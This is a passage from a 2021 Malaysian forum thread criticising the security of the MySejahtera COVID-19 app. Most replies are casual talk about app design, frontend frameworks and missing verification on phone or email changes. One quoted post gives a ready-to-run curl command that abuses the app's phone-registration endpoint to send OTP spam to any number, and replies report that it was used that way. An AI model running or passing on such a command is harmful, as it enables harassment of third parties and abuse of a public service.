Outline ·
[ Standard ] ·
Linear+
MySejahtera Not So Sejahtera, Full of Exploits
kidmad
|
Oct 19 2021, 08:47 AM
|
|
QUOTE(Darkripper @ Oct 18 2021, 11:13 PM) you're talking about their backend implementation, which is out-of-reach. Client trigger mysejahtera, which in turn they forward it to provider. It doesn't matter how the backend is implemented if they open their doors wide open. the way u put it there is somethg so wrong in term of the app design. the request should trigger a notification and queue the request somewhere instead of client calling the service immediately. anyway 0 marks to the application design in this case
|
|
|
|
PzGman
|
Oct 19 2021, 08:55 AM
|
|
no offense but that app is crap lol
|
|
|
|
God Grid
|
Oct 19 2021, 10:37 AM
|
New Member
|
QUOTE(Darkripper @ Oct 19 2021, 02:51 AM) jquery is top go-to library when everyone is manually manipulating HTML elements for frontend, it is easier to use than vanilla JS. It is not bad, just it is not that relevant anymore. Then SPA like Angular, React comes along, which is easier to code, a little bit more structured and efficient. The best thing about SPA is there is less page refresh, providing a better UX. Now you even have Vue, Svelte, SolidJS which is trying to overtake React. Its not just for UI, but for client-side aka frontend to render and do whatever it needs to (communicate with server, service worker to run some shit in the background) yea, jQuery have been more than 10 years? 20 years? but got Ajax ma ahahahahaha only used Vue for their UI like the Vuetify. Now it's all about single page application. everything click click click, no idea if it's going to next page or previous page or anything
|
|
|
|
deejay_krish
|
Oct 19 2021, 10:48 AM
|
|
so called 70mil
|
|
|
|
WaCKy-Angel
|
Oct 20 2021, 11:52 AM
|
|
QUOTE(Darkripper @ Oct 18 2021, 01:51 PM) You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Window user pandai pandai tukar la ) CODE curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \ --form 'countryCode="60"' \ --form 'contactNumber="12345678"' https://www.malaymail.com/news/malaysia/202...res-why/2014651ur doing? lol
|
|
|
|
kons
|
Oct 20 2021, 12:06 PM
|
Конс
|
QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM) yeah someone spam my number with sj otp and i send the screenshot to their helpdesk
|
|
|
|
diffyhelman2
|
Oct 20 2021, 01:19 PM
|
|
QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM) LOL, beat me to it: https://www.freemalaysiatoday.com/category/...ys-mysejahtera/
|
|
|
|
C-Fu
|
Oct 20 2021, 01:38 PM
|
|
QUOTE(Darkripper @ Oct 18 2021, 02:27 PM) They can't do that, as that's the endpoint that client side is calling to trigger it. Eaiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit. It wont solve all, but it reduces the exposure. seems like got captcha now
|
|
|
|
klangboy83
|
Oct 20 2021, 03:01 PM
|
|
5 Unicorns by 2025
|
|
|
|
flexyx
|
Oct 20 2021, 03:04 PM
|
Getting Started
|
dah tak boleh
This post has been edited by flexyx: Oct 20 2021, 03:04 PM
|
|
|
|
Hobbez
|
Oct 20 2021, 03:09 PM
|
|
Does anyone think it can send your data to any third parties? I don't even want to go there....
|
|
|
|
brkli
|
Oct 20 2021, 04:05 PM
|
|
kesian TS...
|
|
|
|
ye0073
|
Oct 20 2021, 04:08 PM
|
|
Some one using the TS code and doing spam liao. Need to report police.
|
|
|
|
TSDarkripper
|
Oct 20 2021, 04:46 PM
|
|
QUOTE(brkli @ Oct 20 2021, 04:05 PM) What?
|
|
|
|
PJng
|
Oct 20 2021, 06:14 PM
|
|
|
|
|
|
IamNOT
|
Oct 21 2021, 10:40 AM
|
Getting Started
|
Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless...
|
|
|
|
TSDarkripper
|
Oct 21 2021, 02:57 PM
|
|
QUOTE(IamNOT @ Oct 21 2021, 10:40 AM) Fxxk... The change email/phone no do not require verification from old email/phone no..... Security 404... Use throw away email also useless... aiya, they say its a feature that get exposed. lel... *FEATURE*. Btw they haven't fix yet also, just add reCAPTCHA, which can be solved using API also
|
|
|
|
emburrar
|
Oct 21 2021, 02:58 PM
|
New Member
|
Ular kj jawab
|
|
|
|
filage
|
Dec 25 2021, 10:38 AM
|
|
Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster?
|
|
|
|
PJng
|
Dec 25 2021, 11:04 AM
|
|
QUOTE(filage @ Dec 25 2021, 10:38 AM) Got anyway to make the mysejahtera load faster? If just want to show the fully vaccinated page also take quite 10-15 seconds to load, any workaround to make it faster? Turn off data, more faster
|
|
|
|